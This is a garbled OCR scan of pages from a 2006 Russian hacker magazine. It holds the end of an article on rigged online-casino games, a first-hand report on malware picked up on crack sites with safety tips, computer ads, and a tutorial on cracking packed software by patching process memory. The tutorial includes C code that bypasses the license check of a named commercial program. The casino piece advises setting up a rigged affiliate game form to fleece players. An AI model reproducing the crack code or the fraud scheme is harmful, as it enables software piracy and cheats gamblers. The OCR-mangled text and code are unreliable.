К этому времени Владелец сайта уже сам 
вышел на связь. А так как все стрелки админ 
умело перевел на него, именно с ним я и про- 
должил беседу. 

Я: Я так понимаю, Вы уже в курсе нашего раз- 
говора с вашим админом? 

Владелец: Да, он скинул хистори. 

Я: И что вы думаете по этому поводу? 

В: ГСЧ в игре «Угадай число» («Больше 

— Меньше») работает только тогда, когда в 
банке игр (80% от суммы ставок) есть доста- 
точная сумма для выплаты выигрыша, в про- 
тивном случае ГСЧ отключается. В принципе, 
обычная схемалотерей. 

Я: Что вы сами думаете об этом, как владелец 
ресурса? Как же быть с «удачей», «везени- 
ем»? Игроку доступна информация об этом 
самом банке и его размере, о том, включен ли 
ГСЧ или нет? 

В: Я думаю, что это вполне нормально для 
лотерей. Удача и везение как раз и приходит 
к игроку, если он в нужный момент будет иг- 
рать. Кто-то проигрывает, кто-то выигрывает 

— иначе просто нельзя. Это закрытая инфор- 
мация. Если бы она была доступна игрокам, то 



это была бы уже благотворительная акция по 
раздаче денег, а так пусть сами думают, когда 
им лучше играть. По статистике, за сутки из 
100 игроков 20-30 выигрывают, так как захо- 
дят в нужное время. 

Я: Да, но тогда где гарантия, что «нужные иг- 
роки» — не ваши друзья, родственники или 
Вы сами? Насколько я знаю, в настоящих 
казино с деревянной рулеткой или в «Спорт 
Лото», если денег у организатора стало 
мало, то никто не подкладывает молча маг- 
нит под стол и не делает «нужные» шарики 
тяжелее. У вас же получается, что везение в 
игре зависит вовсе не от игры, а от размера 
вашего кошелька. 

В: Нам нет смысла разглашать информацию 
о банке игр знакомым или друзьям, даже если 
они этого и очень желают. Если бы мы разгла- 
шали подобную информацию, то они забира- 
ли весь банк себе, а новые игроки постоянно 
проигрывали бы и больше к нам не возвра- 
щались, аэтого мы себе позволить не можем, 
иначе бы не просуществовали почти 3 года. 
Я знаю, как делают в реальной рулетке, но 
об этом не хочу говорить. Что же касается 
лотерей, то они как раз и рассчитывают на 
выплату выигрыша из определенного банка, 
процента от суммы купленныхбилетов, иначе 
бы просто не было смысла проводить подоб- 
ные лотереи. 

Я: Что вы, как владелец достаточно крупного* 
игрового портала, хотите сказать или поже- 
лать будущим читателям (а их будет много, 
поверьте)? 

В: Никогда не пытаться играть вновь, если уже 
проиграли достаточно. А если выиграли, то 
нужно сразу уходить и попробовать сыграть в 
другой день. Это из личного опыта. 

Я думаю, что после прочтения этих строк не- 
многие любители поиграть ломанутся в опііпе- 
казино, так как КЧ на большинстве сайтов 
оставляет желать лучшего. Почему на боль- 
шинстве, а не на всех? Ты обратил внимание 
на упомянутый мною в интервью сайт Іагип. 
сот ? Признаюсь честно: впервые я занимал- 
ся подобными исследованиями около 2-х лет 
назад. 

С тех пор мало что изменилось, но КЧ на Иг- 
руне — для меня новшество. Качественное 
улучшение — вот что пойдет на пользу его 
создателям. Идея состоит в том, что зага- 
данное компьютером число известно игроку 
в самом начале игры! Но в виде тсІ5-хэша. 
После очередного хода вам возвращается 
строка с загаданным числом в виде цифр и 



нескольких случайных символов (для защи- 
ты от брутфорса). Таким образом, вы можете 
на все 1 00% быть уверены в честности игры. 
К сожалению, мне просто не хватит места 
рассказать об этом подробнее (а кое-какие 
соображения уже имеются). Но, если най- 
дутся заинтересованные люди и дело полу- 
чит ход, ты однажды прочтешь на страницах 
любимого журнала о «честном тсІ5» и других 
вкусностях! 

Я не ответил на твой вопрос о «своей паути- 
не». Какже простому смертному создать свое 
казино и поднять денег на игре, не играя вов- 
се? Помнишь те сайты, что висят на доменах 
3-го уровня в ІЧагосГе и на Адаѵа? Это и есть 
те многочисленные реферальные кормушки, 
из которых можем поживиться и мы с тобой. 
Многие казино предлагают партнерскую про- 
грамму. Обычно она бывает двух видов. 
Первая — приведи лоха. Ваша задача — на- 
гнать на сайт казино партнера побольше 
трафика ламаков с деньгами. Слоганы типа 
«Самое-самое-самое казино» уже давно не 
срабатывают, и особо пытливые умы при- 
думали такой ход. Вернись опять к функции 
деп(), что я привел выше. Она срабатывает 
каждый раз при загрузке. Идея зазыва за- 
ключается в том, чтобы научить доверчиво- 
го дурачка долбить на клаве Р5 в надежде 
однажды сгенерировать для себя малень- 
кое или большое число. Играть на числах, 
приближенных к границам, — легко. Но мы 
с тобой поступили еще хитрее и совершен- 
но избавились от ненужных вычислений. А 
на этом тоже можно сыграть и привести 
немало лохов. 

Вторая — сам себе казино. Все, что нужно 
сделать в этом случае, — это скопировать 
с сайта партнера форму игры, вставить в 
пустые скрытые поля НЮЭЕІМ свои рекви- 
зиты и повесить форму на своем сайте. 
Все! Теперь любой, кто играет и проигры- 
вает в твоем казино, моментально делит 
свой проигрыш на две части — тебе и тво- 
ему хозяину-партнеру. 

Атеперь, внимание! Кто мешаеттебе сов- 
местить оба варианта и повесить на своем 
сайте уже «правильную» форму. Она бу- 
дет генерировать только очень маленькие 
или большие числа. И делать-то ничего не 
надо! Такой пример ты можешь увидеть 
на моем сайте (Іехх918.сІа.к2) в разделе 
«Игра». Но ты же прочитал мою статью, и 
потому, я надеюсь, не станешь наступать 
на грабли и играть на моем сайте? Хотя, 
если сыграешь, я против не буду. И-И 



/ 074 





ХАКЕР 09 /93/ 06 







ооѳжиая ооежо 



Адреса магазинов в Москве и в других городах 

вы можете узнать по телефону: 
или на сайте: 








деки сверкая глазами и потирая 
жадные ручки, ты продираешь- 
ся к заветному крэку. На своем 
пути ты сметаешь кучу флешевых окон и 
рор-ир'ов с приглашениями к бесплатно- 
му просмотру порнографии, прослушке 
тысячи гигабайт ітрЗ'шек и увеличению 
своего пениса со скидкой 15%. Преодоле- 
вая преграды, ты осторожно стягиваешь 
потребный крошечный файл, проверяешь 
его своим свежеобновленным антивиру- 
сом и со спокойной душой запускаешь 
программу. Ура, софтина излечилась от 
патологической жадности разработчиков 
и готова верой и правдой служить на твоем 
личном фронте. Ликуя и бесовски усмеха- 
ясь, ты отключаешься от сети... А в это вре- 
мя в недрах системы началась кропотливая 
работа — десятки маленьких программок, 
словно муравьи, копошатся в потрохах 
системных сІІГок, вшиваются в твой брау- 
зер и начинают мониторить соединение с 
сетью, готовые выслать информацию свое- 
му ненаглядному хозяину. «Что за фигня, я 
же юзаю антивирус и не открывал ничего 
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непотребного?» — спросишь ты. А все по- 
тому, чтодобрыедяденьки вместе с лекарс- 
твом всучили тебе кучку килобайт дряни в 
обход твоей защите. 

Общий механизм заражения прост: ты 
заходишь на «зараженный» сайт. Из-за 
глюков браузера в твою систему загружа- 
ется, а далее запускается збеІІ-код. Размер 
троянца настолько мал, что, даже сидя на 
диалапе, ты ничего не заметишь. ЗПеІІ-код 
запускает оболочку, азатем происходят са- 
мые интересные вещи: открывается порт, 
запускается спам-рассылка или ОоЗ-атака 
на определенный ресурс. 

На скриптовые вирусы ты можешь напо- 
роться где угодно, но особая концентра- 
ция наблюдается на крэк-сайтах. Немуд- 
рено, ведь, как известно, бесплатный сыр 
бывает только в мышеловке. И ради того, 
чтобы обезопасить тебя, мой дорогой чи- 
татель, я и предпринял этот тяжелый для 
моей системы обзор. Начал с того, что 
установил голую винду (ХР, 5Р1, никаких 
патчей) и выставил все системные значе- 
ния по дефолту — Заѵа включена, АсІіѵеХ- 



элементы — тоже. После накатил и тут же 
приостановил работу антивируса и файр- 
вола(АѴР и ОіЛроз! соответственно). При- 
знаться, я немного нервничал, выплывая 
на этой убогой шаланде в дикие просторы 
интернета. Но результат оправдал все мои 
ожидания. 

Перво-наперво я зарулил на азіаіаѵізіа. 
Ьох.зк — самый раскрученный поисковик 
крэк-сайтов. Совместив приятное с полез- 
ным, мне захотелось найти лекарство для 
программы ѴѴаѵ Зоіпег. Эта утилита объ- 
единяет несколько ѴѴАѴ-файлов в один, но 
просит за свою работу $30. Введя в поис- 
ковое окно название программы, я полу- 
чил лист из 6 крэк-сайтов. Первый из них 
назывался сгаскз.ат . Игнорируя попапы и 
флеш-окна, я пробрался к ссылке на крэк. 
Но во время моих странствий в системе 
происходили какие-то аномалии: браузер 
постоянно зависал, а в панели задач пару 
раз за секунду появлялось черное окно 
консоли. Это доказывало, что какая-то 
зараза успела пробраться в мою непро- 
патченную систему. Запустив скачанное 
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лекарство, я получил сообщение о несоот- 
ветствии версии программы. Странно, но в 
описании к крэку был отмечен именно тот 
релиз, что имелся у меня на компьютере. 
Впоследствии стало ясно, что крэк — это 
простая подделка, выпускающая на волю 
ВРС-ОоЗ-троянчика. С момента запуска 
псевдокрэка каждые полчаса инет начи- 
нал тормозить, а через пару вынужденных 
перезагрузок система впала в анабиоз (в 
это время я начинал лихорадочно шлепать 
скриншоты и сохранять все, что было под 
рукой). Спустя пару минут медитации вин- 
да упала в ВЗоО. Очевидно, что это была 
вина скриптов, сканирующих сеть и хло- 
пающих непатченные компьютеры. А воз- 
можно, это был ЫеІ-ѴѴопті.ѴѴіп32.РгапсеНе. 
а или Ваіеса (эту заразу впоследствии на- 
шел мой антивирус). 

О Разбор полетов 

Мне ничего не оставалось, как грузануться 
в заТе-тосІе и запустить проверку системы 
с помощью АѴР. Сканирование показало, 
что на моей машине поселились аж 3 раз- 
ных вируса (и это после захода всего на 
один ресурс)! Но интуиция подсказыва- 
ла, что на компе еще что-то прячется. И я 
был прав. Запустив проводник и перейдя 
в системный каталог винды (с:\ѵѵіпсіоѵѵз\ 
зуз!ет32), я отсортировал все файлы по 
дате создания. Оказалось, что в системе 
обитает некий зуз!ет32.бІІ и зуз!ет32. 
сот, созданные во время путешествия по 
сгаскз.ат . Я сразу же кинулся мониторить 
текущие процессы, но оказалось, что эта 
тварь (или какой-нибудь другой троянец) 
установила политику, запрещающую за- 
пуск менеджера задач. Конечно же, я быс- 
тро отменил ее, но мне стало ясно, что не 
все троянцы могут быть замечены антиви- 
русом. 



Следующие ресурсы, которые я посетил 
носили имена сгаскрогіаі.сот . зегіаізііе. 
сот . зиЬзегіаІз.пеі . ѵѵагегг.пт.ги и сгаскегз. 
ога (по порядку). На всех порталах откры- 
вались всплывающие окна и загружались 
троянцы. Но в каждой бочке дегтя есть боч- 
ка меда. Единственный ресурс сгаскегз.ога 
выдал мне чистый крэк, который взломал 
программу без последствий. 

Хочется рассказать о ресурсе сгаскрогіаі. 
сот , а точнее, об одном ядовитом рор-ир'е, 
открывающимся при выборе крэка. В систе- 
му через баг Осла сливается «картинка» 
рісІО-Ірд, которая на самом деле является 
экзешником и заменяет собой ѴѴіпсІоѵѵз 
Месііа РІауег. Затем сливаются приложе- 
ния ѵѵеЬ.ехе и сіаззіоасіцаг, после чего 
стартует апплет и определяет местона- 
хождение винды (СеІѴѴіпсІоѵѵзОігесІогуО), 
сбрасывает туда ѵѵеЬ.ехе и запускает его. 
Волшебным образом в системе оказыва- 
ется троянец Тгоіап.ѴѴіп32.3роопег.Е А он, 
в свою очередь, тащит за собой Тгоіап- 
ОоѵѵпІоасІег.ѴѴіп32.3таІІ.арЕ Короче, на- 
чинается конкретная круговерть, которая 
заканчивается тем, что на компьютере 
оказываются Тгоіап-Зру.ѴѴіп32.Вапкег.ік, 
Тгоіап-Ргоху.ѴѴіп32.3таІІ.Ыі, Васксіоог. 
ѴѴІП32.2ІПЗ.С, Тгоіап-Огоррег.ѴѴіп32.3таІІ. 
ѵп, Тгоіап-Огоррег.ѴѴіп32.3таІІ.ѵѵр, Тгоіап- 
ОоѵѵпІоасІег.ѴѴіп32.Адеп!.Іѵ и Васксіоог. 
\Л/іп32Дееппр.с. Душевно, правда? Кро- 
ме этого, модифицируется файл Ьозіз, в 
котором блокируются урлы Касперского, 
МСА^ее и Зутапіес. Мало того, как я за- 
метил, происходит генерация фейкового 
Ыт 1-файл а, который забрасывается на 
десктоп и сообщает юзеру о том, что у 
него, по крайней мере, 3 опасных вируса 
в системе, поэтому предлагает пройти по 
адресу ІорапІіѵігиз.Ьіг для того, чтобы ска- 
чать антивирус. 



основы 

БЕЗОПАСНОЙ 

ЖИЗНЕДЕЯТЕЛЬНОСТИ 



ЕСЛИ ТЫ ЖИТЬ НЕ МОЖЕШЬ БЕЗ КРЭ- 
КЕРСКИХ РЕСУРСОВ, ТО ОБЯЗАТЕЛЬ- 
НО ПРИДЕРЖИВАЙСЯ СЛЕДУЮЩИХ 
РЕКОМЕНДАЦИЙ. 



1 . Не используй ІЕ для навигации по «ха- 
лявным» сайтам. Рекомендую поставить 
последний ЕігеЕох, в котором на порядок 
меньше глюков. А лучше всего серфить 
крэк-порталы через консольный Іупх. 

2. Если юзаешь ѴѴіпХР, то обязательно 
поставь ЗР2 и накати все хотфиксы. 

3. Поставь файрвол (тут уже дело вкуса, 
но желательно, чтобы был интегриро- 
ванный скриптчекер) и антивирус. 

4. Отключи ^ѵа (хотя вряд ли согла- 
сишься — большинство современных 
ѵѵеЬ-страничек будут выглядеть доволь- 
но убого, да и навигация усложнится на 
порядок) и неподписанные АсІіѵеХ-э/]е- 
менты. Также отключи прием сооІ^ез со 
всех ресурсов (потом пропишешь вруч- 
ную те сайты, которым это разрешено). 

5. Регулярно проверяй Ьозіз-ф^йл наі 
предмет сторонних линков. 

6 . Сделай снимки системы и программ, 
которые ты используешь в сети и ; раз в 
неделю сверяй их с контрольными об- 
разами. Если зверь и влезет, то ты без 
проблем сможешь отследить, когда 
как это произошло. Думаю, не нужнѳч-к =* 
поминатьотом, что в категории рискам - 
ходятся в первую очередь порно-ѵѵаге; - 
крэк сайты. В принципе, идеологию 
владельцев этих сайтов можно понят , 
так как они зарабатывают на пороках а 
наказывают за эти пороки. 
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> На таких вот сайтах и лазит зверье 



> Лежащих здесь исходников хватит на пару десятков вирусов 




О Троян среди рефератов 

Смекнув, что троянцы могут прятаться не 
только на крэк-ресурсах, я заглянул на 
ѵѵѵѵѵѵ.гѳіѳгаіоѵ.пѳі и ѵѵѵѵѵѵіогит.х-аоісі.ги 
(якобы для поиска реферата). Загрузив 
первый попавшийся реферат, я опять 
сделал анализ системы. О-па! Вот и пер- 
вый улов — ѴВЗ.РесІІоЕ Краткие ТТХ это- 
го вируса: написан на языке ѴізиаІ Вазіс 
Зсгірі (ѴВЗ) и зашифрован ѴізиаІ Вазіс 
ЕпсобесІ Зсгірі (ѴВЕ). Создаваясь, РесІІоТ 
скидывает свой код в системный каталог 
винды с именем КегпеІ.сІІІ. Кроме этого, 
вирус создает файлы кіѵѵаІІ.ді^ в каталогах 
3уз!ет32 и ѴѴеЬ, а потом копирует себя 
во все каталоги на других дисках в виде 
файла ТоІсІег.ІіД. Размножается зверушка 
нехитро: файл ТоІсІег.ІіД копируется виру- 
сом во все каталоги при их просмотре/от- 
крытии Эксплорером (включая Яазб-носи- 
тели и дискеты), потом дописывает себя во 



все НТМ-файлы, находящиеся в каталоге 
ѵѵіпбоѵѵзѵѵеЬ и скидывает себя в іеііСІіІт, 
оТЛіпе.КіІип и прочие файлы. Старо, конеч- 
но, но юзеру жизнь попортить может (я 
изрядно замучился убивать продукты его 
жизнедеятельности) :). 

Флешевые ролики, которые то и дело по- 
являются и на сгаск, и на других халявных 
ресурсах, также могут содержать в себе 
различную заразу. Вспомни абѵѵаге-трой, 
который сидел на МуЗрасе. Флешка, ко- 
торая рекламировала забугорный сайт 
бескоиіуоигбеск.сот . использоваладырку 
в виндах, связанную с *.ѵѵтЕ Шуму было! 
Хотя по сути вирь ничего не затирал, но до- 
ставал реально — постоянно скидывал кучу 
рор-ир окошек с оравой баннеров плюс мо- 
ниторил серфинг по сети. А изготовили его 
братья-славяне — за свежими картинками 
он обращался к нашему серваку. Заразил 
он тогда около 2 миллионов тачек, ущербу 



нанес на 3 миллиона вечнозеленых. Его я 
узрел на сгаскз.ат (через флешку мне без 
проблем загрузился червячок ЫеІ-ѴѴогт. 
ѴѴіп32.ЕгапсеДе.а). 

В результате моего долгого эксперимен- 
та выяснилась непреложная истина: чем 
меньше размерами сайт, тем выше ве- 
роятность того, что он червив от начала 
тэга <б{тІ> до последнего пикселя на его 
морде. Порывшись во всей этой шушере, 
я вылез оттуда обвешанный 16 видами 
дряни. Среди них обнаружились малоиз- 
вестные ^.ЗсоЬ.Тгоіап, ^.ЗсоЬ.Тгоіап. 
Ь, Во^га, Тгоі/ВогоЫ-Сеп, ТгоіапСІіскег. 
ѴѴіп32.3таІІ.Іі (эту заразу кто-то моди- 
фицировал, так как оригинал кликал на 
ѵѵѵѵѵѵ.зех.бе . а этот вел на другой сайт) и 
еще кучка мелких червячков. Один из них 
доставил мне немало потехи. Мелкий уро- 
дец пытался скрыть свое тело, шифруясь 
ксором :). ПЕ 




эвое поколение ТВ-тюнеров от АѴегМесІіа 



АѴегТѴ НуЬгісІ+РМ РСІ 

• Аналоговое ТВ, цифровое ТВ и 
РМ-радио 

• Функции многооконного РІР/РОР 
просмотра 

• 32/64-разрядная совместимость 

• ПО разработано специально для 
России —АѴегТѴ 6.1 



реклама 



АѴегТѴ МОЕ 116 РІиз 



• Передовая технология 
аппаратной МРЕ6 компрессии 

• Регулировка цвета для 
каждого канала 

• Совместим с ѴѴіпсІоѵѵз ХР МСЕ 

• ПО разработано специально 
для России —АѴегТѴ 6.1 



АѴегТѴ Зіигііо 509 



• Функция РЮ5 

• Передовая модель тюнера 
РІпіІірз с функциями объемного 
звука и регулировки тембра 

• Новинка 
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Репііит' Р 

іпзМе™ 



Два ядра. 
Делай больше. 






ГІехігоп Ргетіега О 

домашний компьютер 

• Процессор Іпіеі® Репііит® Р 805 2.66 ГГц 

• Оперативная память 512Мб ООП II 

• Видеокарта А51І5 «ЕАХІбООРго/Ю» 256МБ 

• Жесткий диск 160 ГБ 

• Привод ОѴѴ/СО-НѴЧ 

• МісгозоГІ ѴѴіпсІоѵѵз ХР Ноте Есііііоп 5Р2, рус. 



Новейшие технологии 
и надежный уровень 
производительности 



Сделайте Ваш выбор в пользу компьютеров 
Ріехігоп на базе двухъядерного процессора 
Іпіеі® Репііит® й и откройте новые 
возможности Вашего ПК. ; 



Ріехігоп ІІпіѵегзе О 

мультимедийный центр 

• Процессор Іпіеі® Репііит® О 820 2.8 ГГц 

• Оперативная память 512Мб ООП II 

• Видеокарта ЗаррЫге «Набеоп Х1600 Рго» 256МБ 

• Жесткий диск 160 ГБ 

• Привод ОѴО -НѴѴ 

• МісгозоГІ ѴѴіпсІоѵѵз ХР Ноте Есііііоп 5Р2, рус. 



КАРГА 
ПОСТОЯННОЙ 
ПОКУПАТЕЛЯ 

а&Л 034 2 3&В 



КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТ 



Адреса салонов-магазинов: 



м. «Бабушкинская», 
ул. Сухонская, 7а 



м. «Улица 1905 года», 
ул. Мантулинская, 2 



При покупке компьютера 
РІехігоп получи Карту 
постоянного покупателя 
в подарок. 



Единая справочная: (495) 105-64-47 



Интернет-магазин: ѵѵѵѵѵѵ.ісепіег.ги 



Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Ьо^о, Соге Іпзісіе, ІпТеІ, Іпіеі І-О^о, ІпТеІ Соге, ІпТеІ Іпзісіе, ІпТеІ Іпзісіе І_о§[о, Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзісіе, Репііит, Репііит Іп: 
являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениями на территории 



НТР 



РІехігоп Махіта О 

игровая станция 
нового поколения 

• Процессор Іпіеі® Репііит® О 930 3 ГГц 

• Оперативная память 1 Гб ООП II 

• Видеокарта ЗаррГнге «Пасіеоп Х1600 Рго» 256МБ 

• Жесткий диск 160 ГБ 

• Привод ОѴБ -НѴѴ 

• МісгозоГІ ѴѴіпсІоѵѵз ХР Ноте Есііііоп 5Р2, рус. 
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м. «Владыкино», 
Алтуфьевское ш 














КРИС КАСПЕРСКИ 



Опііпе раІсНіпд 
в секретах и советах 






X ПОБЕЖДАЕМ УПАКОВАННЫЙ КОД 

ОРР-ЫЫЕ РАТСН (ОН ЖЕ ВІТ-НАСК) — ЭТО СПОСОБ ВЗЛОМА КОДА, КОГДА МЫ ГРУЗИМ ПРОГРАММУ В НІЕѴѴ И ПРАВИМ 
ТАМ ПАРУ БАЙТ. А ЕСЛИ ПРОГРАММА УПАКОВАНА? ТОГДАУ НАС ДВА ПУТИ: РАСПАКОВАТЬ ЕЕ И ХАКНУТЬ В ОББ-І_ІІ\ІЕ, ИЛИ 
ЖЕ, ДОЖДАВШИСЬ ЗАВЕРШЕНИЯ РАСПАКОВКИ, МОДИФИЦИРОВАТЬ ПАМЯТЬ ПРОЦЕССА НА ЛЕТУ, ПРОВОРНО ОБХОДЯ 
ЛОВУШКИ ТИПА ПРОВЕРКИ СРС. ВОТ ОБ ЭТОМ СПОСОБЕ МЫ И БУДЕМ ГОВОРИТЬ! 



I нять навороченный упаковщик/ 
протектор чрезвычайно сложно. 

I I Качественныхраспаковщиковнет, 

и приходится работать вручную, что сильно 
напрягает. К тому же последние версии про- 
текторов устраивают разные подлянки (кра- 
дут часть инструкций, внедряют р-код, эмули- 
руют выполнение условных переходов и т. д.), 
в результате чего распакованная программа 
работает неустойчиво и периодически пада- 
ет, споткнувшись об очередную неудаленную 
подлянку. Поиск и удаление защиты отнимает 
кучу времени и не дает никаких гарантий. Лад- 
но, если это взлом «для себя» — взломанная 
программа «доводится до ума» в ходе эксплу- 
атации. А если надо что-то срочно взломать 
для заказчика? 

Получить дамп, пригодный для дизассемб- 
лирования (не для запуска!), относительно 
несложно, и с этой задачей хорошо справля- 
ется РЕ-ТООБЗ. Программы с динамической 
шифровкой (это когда расшифровка идет 
небольшими порциями, и отработавший 
свое фрагмент тут же зашифровывается 
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вновь) обычно исследуются в отладчике. 
Возлагая все надежды на навесной протек- 
тор, программисты довольно небрежно от- 
носятся к «термоядерному реактору» защит- 
ного механизма, отвечающего за контроль 
серийного номера, проверку количества за- 
пусков, истечение испытательного строка и 
т.д. Большинство программ по-прежнемуло- 
маются правкой нескольких байт, только вот 
расположены эти байты глубоко под слоем 
упакованного кода. Ніеѵѵтутуже непригоден, 
поэтому действовать приходится так: запус- 
каем ломаемый процесс на выполнение, 
ждем несколько секунд, чтобы все, что нуж- 
но, успело распаковаться, а затем модифи- 
цируем образ процесса прямо в памяти! Вот 
это и называется оп-Ііпе раісМпд'ом. Разуме- 
ется, приведенная схема далека от идеала и 
не учитывает ряда практических реалий, но 
надо же с чего-то начинать! 

О Простейший оп-Ііпе раісііег 

Чтение памяти «чужого» процесса осущест- 
вляется функцией РеасІРгосеззМетогу, а за- 



пись — ѴѴгіІеРгосеззМетогу. Некоторые лес- 
ные сурки пишут, что нужно остановить все 
потоки процесса перед тем, как его патчить 
через ЗизрепсІТІтгеасІ, а после патча возобно- 
вить их выполнение функцией РезитеТИгеасІ. 
Но это не так! Патчить можно и активный про- 
цесс, но только по одной команде за раз, в 
противном случае возможна такая ситуация, 
что процесс был прерван планировщиками 
между хакаемыми командами, а мы их замени- 
ли. Причем не факт, что границы новых команд 
совпадают со старыми (то есть ЕІР указыва- 
ет в начало команды, а не в середину), иначе 
поведение ломаемой программы становится 
непредсказуемым и может привести к краху, 
хотя вероятность этого события ничтожно 
мала. 

Нужно делать так: остановить все потоки, а 
затем прочитать контекст каждого из фун- 
кции ОеГПтгеасІСопІехЕ убедившись, что ни 
один из потоков в данный момент времени не 
выполняет хакаемый код, в противном случае 
необходимо либо скорректировать ЕІР, пере- 
установив его на начало хакнутой команды, 
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либо разморозить потоки и подождать ѳщѳ чуть-чуть. Но, 
во-первых, это слишком навороченно выходит, а во-вто- 
рых, остановка/пробуждение потоков может сильно аук- 
нуться, поскольку далеко не все программисты следят за 
синхронизацией. 

Мы будем действовать простым, но достаточно надежным 
путем, срабатывающим в 99, 999% случаев: запускаем про- 

ется, читаем память активного процесса, чтобы убедиться, 
что по данному адресу расположено то, что нам нужно 
(иначе ругаемся на неверную версию ломаемой програм- 
мы), и «вживую» (без всякого наркоза) записываем сюда 
«исправленную» версию машинных команд. 

Возьмем, наг|)имер, КІіЕхрІогег от ВипіітеЗоЙѵѵаге. С по- 
мощы^РН^убедимся, что он упакован АЗРаск 2.11с, а 
значит, прямой ЬіИіаск невозможен. Что же, поступим по- 
другому! Снимаем с программы дамп, загружаем его в ди- 
зассемблер и по перекрестным ссылкам к строке «Тбапк 
уои іог Іісепзіпд Рипйте'з ОізкЕхрІогег» выходим на следу- 
ющий код: 



ІФрагмент защитного механизма ЫІЕхрогег'аІ 



04Е59Е0^ 

04Е59Е2 \ъ Іос_4Е5А37 ; — > облом с регистрацией! 




04Е59Р2 саІІ зиЬ_4Е53В8 ; запись данных в реестр| 

04Е59Р7 Іѳзі аі , * 

04Е59Р9 \т Іос_4Е5А15И Ь^@^^.ДИИ 

04Е59РВ ризіі 




04Е5А04 тоѵ сіі,2ИИ зЯД^Змі 

04Е5А06 тоѵ еах,аТЬапкУои;"ТЬапкуои. 



Мы видим условный переход \т Іос_4Е5А37, «шунтирую- 
щий» вывод строки об успешной регистрации. Очевидно, 
что, забив его двумя командами [\ЮР (если только в про- 
грамме не присутствует других проверок), мы сломаем 
защиту, и тогда любой регистрационный номер будет вос- 
приниматься как правильный. 

Пишем «ломалку», алгоритм работы которой ясен из ком- 
ментариев. 



ЫІЕхрІогег.сгаск.с — простейшая опІіпе-ломалка| 

таіп(іп1 с, сГіаг **ѵ) Д \ ‘ ЩГ; ■ * '” ЩМ 



II 



РѴѴОРР 1М; 5ТАРТЦР1І4ЕО 

РРЮСЕ55_ІІ\ІЕОРіМАТІО І\І рі; ипзідпесі сИаг *Ьи \Щ 
^/данные^^ 

ипзідпесі сГіаг х_оісі[] = {0x74,0x53}; //оригинальные байты| 
ипзідпесі скаг х_пеѵѵ[] = {0x90,0x90};// хакаемые байты^В 
ѵоісГ х_оЕ = 0х04Е59Е2; // адрес для хака 
тетзеі(&зЩЩ2ео1(зі)^ 

^запус^троцессадл^злома^^ч^^^^^^^І^ж 
І1 (!СгеаІеРгосезз(0,ОеЮоттапсіипе()+5ІгІеп(ѵ[0])+ Д- 



^(СеГСоттапсіип^ 

^^ДОДОД&зіДр^ 

СеЮоттапсіипе()+5ІгІеп (ѵ[0])+^^7І^^ ^^^^^ 

_(ЮеЮоттапЩ^ 

// ждем завершения распаковки^Д ѵ ,' 

Іюг (І\І=0;І\І<69;І\І++) {ргіп!І : ("рІз,ѵѵаі1:%с\г","-\\І/"[№/о4]); 

ЗІеер( 100 );}И ' 

наемпатчить^И 
ок, таке 

ерка версии ломаемой программы^у ?7іфу| 
І госеззМетогу(Д * "’Ц 

3 госезз, х_оф ЬиТ, зІ2ео1(х_оІсІ), &М);ИЯЦ|| 
з ігео1(х_о I сі ) ) 

геі пщэппіф^РРлеасІіпдщп^^ 
ѵ ютр(х_оІсІ,ЬиЕзІ2ео1(х_оІсІ))) 



геіигп ргіп!1 : ("-ЕРР:іпсоггес1ѵег!\хАп");| 
// патчим условный переходИ& 4б-Ж\2 
ѴѴгі1еРгосеззМетогу(^^І^^^^^^ 



рі.ІіРгосезз, х_оф> 


:_пеѵѵ,5І2еоі(х_пеѵѵ),&І\І);| 


іТ (Ы ! = зігео!(х_пеѵѵ)) 




геШгп ргіпЙ("-ЕПП:ѵѵгШпд ѵт-тетогу!\х7\п");| 



Запускаем ЫіЕхрІогег.сгаск.с, указав имя ломаемой 
программы (вместе с аргументами, если они есть) в 
командной строке. Происходит следующее: АЗРаск 
распаковывает код и передает программе управ- 
ление (наша «ломалка» все еще ждет). Программа 
видит, что она незарегистрирована, а демонстра- 
ционный строк давно истек, поэтому и выбрасыва- 
ет диалоговое окно с требованием ввести серийный 
номер. К этому времени терпение у нашей «ломалки» 
кончается, и пока пользователь вводит первый при- 
шедший ему на ум серийный номер, \т Іос_4Е5А37 ус- 
пешно заменяется на ЫОР/ЫОР, и при нажатии на ОК 
защита говорит «ібапкз» и продолжает выполнение 
программы в обычном режиме. Пользуйся — не хочу. 
Естественно, при следующем запуске мерзкий диа- 
лог появится вновь, отвлекая нас от работы и застав- 
ляя вводить тупые серийные номера. А нельзя ли без 
этого как-нибудь обойтись? Можно! И сейчас мы по- 
кажем как! 

□ Циклотрон, или гонки на опережение 

Продолжая исследование программы, мы обнаруживаем 
пару любопытных команд: тоѵ Ь,[еах+10Н], 1/тоѵ еах, 
сіѵѵогсі_582СЕ8, очевидно устанавливающих флаг регис- 
трации (что легко проверить экспериментальным путем 
под отладчиком). 

Идея! Чтобы доломать программу окончательно, необ- 
ходимо установить флаг регистрации в единицу еще до 
того, как он будет прочитан. То есть опередить защиту! 
В старые время эта задача решалась пошаговой трас- 
сировкой, но теперь протекторы поумнели и просто так 
трассировать себя не дадут, однако, поскольку меж- 
ду распаковкой кода и передачей управления защите 




На дискеты найдешь все 
исходники и скомпили- 
рованные бинарники к 
статье, а также свежую 
версию ЫІЕхрІогег от 
РипйтеЗоЙѵѵаге. 



5ЕН расшифровывается 
какЗігисІигесІ Ехсерііоп 
НапсІІІпд (Структурная 
Обработка Исключений) 
и представляет собой 
механизм, с помощью 
которого операционные 
системы семейства 
ѴѴІпбоѵѵз 9х и І\ІТ позво- 
ляют прикладным прило- 
жениям перехватывать 
аппаратные исключения 
и самостоятельно их 
обрабатывать. Необра- 
ботанные исключения 
приводят к диалоговому 
окну с сообщением о 
критической ошибке. 
Начиная с ѴѴІпбоѵѵз 2003, 
операционная система 
предоставляет более 
продвинутый механизм 
векторной обработки 
исключений — ѴЕН 
(ѴесіогесІ Ехсерііоп 
НапсІІІпд), однако он 
пока еще не так попу- 
лярен. 
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> Программа приобретает статус лицензионной, даже если поля пате/ >Оп-Ііпе раісіі путем перехвата АРІ-функций не 

Іісепзе кеу пусты вызывает значительной загрузки проца 




проходит какоѳ-то время, мы вполне можем 
опередить защиту, если будем выполнять 
РеабРгосеззМетогу/ѴѴгііеРгосеззМетогу в 
